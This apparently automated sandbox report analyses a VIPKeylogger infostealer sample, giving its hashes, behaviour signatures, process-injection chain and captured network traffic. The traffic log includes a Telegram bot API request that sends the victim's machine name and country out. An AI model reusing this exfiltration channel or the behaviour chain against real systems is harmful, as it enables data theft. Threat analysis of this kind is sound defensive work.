Analysis

  • max time kernel
    106s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10/01/2025, 14:09 UTC

General

  • Target

    3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe

  • Size

    634KB

  • MD5

    80a64f0b8df55d637e135f0eb4fb6b70

  • SHA1

    f491fc184d0f15d789e81577e47446478c10ed53

  • SHA256

    3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8

  • SHA512

    f2604fc98d1ed6959b4a42ef442cac15919ebb1b26f7516fa0ca782c639d035c7f5c0f599511e87246338a959be4e5104ff98e3df4bb7ab78b50389784e83432

  • SSDEEP

    12288:ZOv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPiaqooGCQemOT6I0FGk9x:Zq5TfcdHj4fmbGG53OF0Nx

Malware Config

Extracted

Family

vipkeylogger

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.

  • Vipkeylogger family
  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe
    "C:\Users\Admin\AppData\Local\Temp\3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1264
    • C:\Users\Admin\AppData\Local\inhumate\demonetised.exe
      "C:\Users\Admin\AppData\Local\Temp\3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:3724
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Users\Admin\AppData\Local\Temp\3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe"
        3⤵
        • Accesses Microsoft Outlook profiles
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:1500
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 732
        3⤵
        • Program crash
        PID:2276
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3724 -ip 3724
    1⤵
      PID:4760

    Network

    • flag-us
      DNS
      133.211.185.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      133.211.185.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      64.159.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      64.159.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      checkip.dyndns.org
      svchost.exe
      Remote address:
      8.8.8.8:53
      Request
      checkip.dyndns.org
      IN A
      Response
      checkip.dyndns.org
      IN CNAME
      checkip.dyndns.com
      checkip.dyndns.com
      IN A
      132.226.8.169
      checkip.dyndns.com
      IN A
      193.122.6.168
      checkip.dyndns.com
      IN A
      132.226.247.73
      checkip.dyndns.com
      IN A
      158.101.44.242
      checkip.dyndns.com
      IN A
      193.122.130.0
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:25 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:25 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:26 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:26 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:26 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:27 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:27 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:27 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:28 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-jp
      GET
      http://checkip.dyndns.org/
      svchost.exe
      Remote address:
      132.226.8.169:80
      Request
      GET / HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
      Host: checkip.dyndns.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:28 GMT
      Content-Type: text/html
      Content-Length: 106
      Connection: keep-alive
      Cache-Control: no-cache
      Pragma: no-cache
    • flag-us
      DNS
      reallyfreegeoip.org
      svchost.exe
      Remote address:
      8.8.8.8:53
      Request
      reallyfreegeoip.org
      IN A
      Response
      reallyfreegeoip.org
      IN A
      104.21.112.1
      reallyfreegeoip.org
      IN A
      104.21.32.1
      reallyfreegeoip.org
      IN A
      104.21.64.1
      reallyfreegeoip.org
      IN A
      104.21.96.1
      reallyfreegeoip.org
      IN A
      104.21.80.1
      reallyfreegeoip.org
      IN A
      104.21.16.1
      reallyfreegeoip.org
      IN A
      104.21.48.1
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:26 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005620
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xmql4eDt0UjHAS%2Fd%2FJNg%2Bcl9WFHOJezCToQ3QOlJcud4WVg06xARq3pmfpme2PRwnNZUsyp5eF7NCYMgpsmQDd3NuNTCzkeN3gnxNQaXYyr%2Fv%2B3Fhcfu9HnLts%2B4h6xZ2G3H5kCw"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eaa3e616535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=29594&min_rtt=26499&rtt_var=11354&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3009&recv_bytes=390&delivery_rate=134993&cwnd=253&unsent_bytes=0&cid=0a49e2d9766b0697&ts=100&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:26 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005620
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3jXQrgq0%2B9%2BwWWLpglyEy9oCQ3SEgjnRNnrEyy6XRxIlSQ9CIdWLxibEwWiCqOMbhkQYV%2FJBlz9%2FvwlzISfkqYTnGPWaD%2BpvqvYO8DhRj1q87BFVzWRR%2BZ0HmD57Zt1rb8toYUp5"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eac38946535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=35532&min_rtt=26499&rtt_var=20390&sent=6&recv=8&lost=0&retrans=0&sent_bytes=4285&recv_bytes=482&delivery_rate=134993&cwnd=254&unsent_bytes=0&cid=0a49e2d9766b0697&ts=417&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:26 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005620
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DD6jpCQGRdDkdH%2FXt%2Bk2vJ1%2FQIz5%2BAq01qeva1elusGj1tUy5ZacZS19EV0yUSJzMHfJWp3ZggyDhRC9f7W%2FlAGmvm1x2uXnIofGBbSjwUyaKJ2HuyJ%2FTmv9BxDaV6fzsPcmXPFY"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eae2adf6535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=40190&min_rtt=26499&rtt_var=24609&sent=7&recv=10&lost=0&retrans=0&sent_bytes=5561&recv_bytes=574&delivery_rate=134993&cwnd=255&unsent_bytes=0&cid=0a49e2d9766b0697&ts=731&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:27 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005621
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkaxaa88JcVy4GwOGEsDf8DXnH6cEPt55nLgZ8qiGFgxS22l7GClfDGAWgRYs6d%2FcYacmYxBcwtskJfXZN5xc%2FVp0cQHBAcG4JE5JC3UzmbYV7ZQse2cvD21DV223PypPKJ0TzQs"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eb02d3f6535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=44132&min_rtt=26499&rtt_var=26341&sent=8&recv=12&lost=0&retrans=0&sent_bytes=6838&recv_bytes=666&delivery_rate=134993&cwnd=256&unsent_bytes=0&cid=0a49e2d9766b0697&ts=1038&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:27 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005621
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xBUXWbBxMK06GGHl1qY6VIRCstIvlGIRXlnO%2Frqtr%2Bm2lFEMm9Xh%2B%2BPook%2FrddxTRktE4UlsbAeN8SomnX7jq6Phetl3Nqm5dGFcn5thK5Bt%2Fotl3kf%2Fm3nPw5Kf8Dn5Tyo0cEDB"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eb21fbb6535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=48230&min_rtt=26499&rtt_var=27951&sent=9&recv=14&lost=0&retrans=0&sent_bytes=8108&recv_bytes=758&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=1358&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:27 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005621
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=houIjoiAgglyLyOKmEx%2FngSfQOroRZr68erIwrSWPpvY8Cc7nPIe%2BSOWkdhhaJDptIv5hMyMznSv0vSE4dkbWVZeImHYRMj1sj3z4xXaYNQ5NMCktzLZJpYvWlwm4m9ND4iVAcgv"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eb43ab06535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=50828&min_rtt=26499&rtt_var=26159&sent=10&recv=16&lost=0&retrans=0&sent_bytes=9388&recv_bytes=850&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=1692&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:28 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005622
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sG8Dr5L%2FkW34t57BiPLEPBEF%2BZfYuV6nMlF8NjMwsK7rsiKW1zeM8JP48R4FIae93DkOzMhDYfg9zshE%2FFopkU%2Fa%2BGTkoSXgipjC565b4xMMt9hojTfrx7CChVfXZrlnKd40kcpV"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eb63d566535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=54365&min_rtt=26499&rtt_var=26694&sent=11&recv=18&lost=0&retrans=0&sent_bytes=10659&recv_bytes=942&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=2014&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:28 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005622
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i5tDYMR%2F%2FB5VxijW9L9MbBtpYIp186Eknhh85ynLO%2BexHENfaN4DkXJ%2FQAShWaVw0PBUip9OQ7F2JqZvtZOH5AMbXh1ae1U3e0yW0OLh1jUKswPKwM968JQT6wWOenkcZ0MytuKz"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eb828086535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=56265&min_rtt=26499&rtt_var=23820&sent=12&recv=20&lost=0&retrans=0&sent_bytes=11937&recv_bytes=1034&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=2325&x=0"
    • flag-us
      GET
      https://reallyfreegeoip.org/xml/181.215.176.83
      svchost.exe
      Remote address:
      104.21.112.1:443
      Request
      GET /xml/181.215.176.83 HTTP/1.1
      Host: reallyfreegeoip.org
      Response
      HTTP/1.1 200 OK
      Date: Fri, 10 Jan 2025 14:09:28 GMT
      Content-Type: text/xml
      Content-Length: 356
      Connection: keep-alive
      Cache-Control: max-age=31536000
      CF-Cache-Status: HIT
      Age: 5005622
      Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
      Accept-Ranges: bytes
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXb0D9amDkAinM9ToP3pnIMedRA2l0CFwXLlL8nN6vmalADfbJXUleBRd%2F80C6RqRaNWP%2BFZdlpKJmbhPYK0s8bBHu5fKEhTDN70T0e%2B6KgeK3ZM3GKEDCig0j2VOsFWvjk3eSgV"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ffd3eba2a526535-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=58168&min_rtt=26499&rtt_var=21672&sent=13&recv=22&lost=0&retrans=0&sent_bytes=13214&recv_bytes=1126&delivery_rate=134993&cwnd=257&unsent_bytes=0&cid=0a49e2d9766b0697&ts=2641&x=0"
    • flag-us
      DNS
      169.8.226.132.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      169.8.226.132.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      1.112.21.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      1.112.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      api.telegram.org
      svchost.exe
      Remote address:
      8.8.8.8:53
      Request
      api.telegram.org
      IN A
      Response
      api.telegram.org
      IN A
      149.154.167.220
    • flag-nl
      GET
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:UTKBEBLO%0D%0ADate%20and%20Time:%201/10/2025%20/%202:09:27%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20UTKBEBLO%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
      svchost.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:UTKBEBLO%0D%0ADate%20and%20Time:%201/10/2025%20/%202:09:27%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20UTKBEBLO%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
      Host: api.telegram.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Server: nginx/1.18.0
      Date: Fri, 10 Jan 2025 14:09:28 GMT
      Content-Type: application/json
      Content-Length: 55
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-us
      DNS
      220.167.154.149.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      220.167.154.149.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      56.163.245.4.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      56.163.245.4.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      198.187.3.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      198.187.3.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      217.135.221.88.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      217.135.221.88.in-addr.arpa
      IN PTR
      Response
      217.135.221.88.in-addr.arpa
      IN PTR
      a88-221-135-217.deploy.static.akamaitechnologies.com
    • 132.226.8.169:80
      http://checkip.dyndns.org/
      http
      svchost.exe
      2.2kB
      3.4kB
      21
      15

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200

      HTTP Request

      GET http://checkip.dyndns.org/

      HTTP Response

      200
    • 104.21.112.1:443
      https://reallyfreegeoip.org/xml/181.215.176.83
      tls, http
      svchost.exe
      2.2kB
      15.1kB
      25
      16

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200

      HTTP Request

      GET https://reallyfreegeoip.org/xml/181.215.176.83

      HTTP Response

      200
    • 149.154.167.220:443
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:UTKBEBLO%0D%0ADate%20and%20Time:%201/10/2025%20/%202:09:27%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20UTKBEBLO%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
      tls, http
      svchost.exe
      1.2kB
      6.7kB
      12
      11

      HTTP Request

      GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:UTKBEBLO%0D%0ADate%20and%20Time:%201/10/2025%20/%202:09:27%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20UTKBEBLO%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

      HTTP Response

      404
    • 8.8.8.8:53
      133.211.185.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      133.211.185.52.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
      128 B
      1
      1

      DNS Request

      172.210.232.199.in-addr.arpa

    • 8.8.8.8:53
      64.159.190.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      64.159.190.20.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      checkip.dyndns.org
      dns
      svchost.exe
      64 B
      176 B
      1
      1

      DNS Request

      checkip.dyndns.org

      DNS Response

      132.226.8.169
      193.122.6.168
      132.226.247.73
      158.101.44.242
      193.122.130.0

    • 8.8.8.8:53
      reallyfreegeoip.org
      dns
      svchost.exe
      65 B
      177 B
      1
      1

      DNS Request

      reallyfreegeoip.org

      DNS Response

      104.21.112.1
      104.21.32.1
      104.21.64.1
      104.21.96.1
      104.21.80.1
      104.21.16.1
      104.21.48.1

    • 8.8.8.8:53
      169.8.226.132.in-addr.arpa
      dns
      72 B
      157 B
      1
      1

      DNS Request

      169.8.226.132.in-addr.arpa

    • 8.8.8.8:53
      1.112.21.104.in-addr.arpa
      dns
      71 B
      133 B
      1
      1

      DNS Request

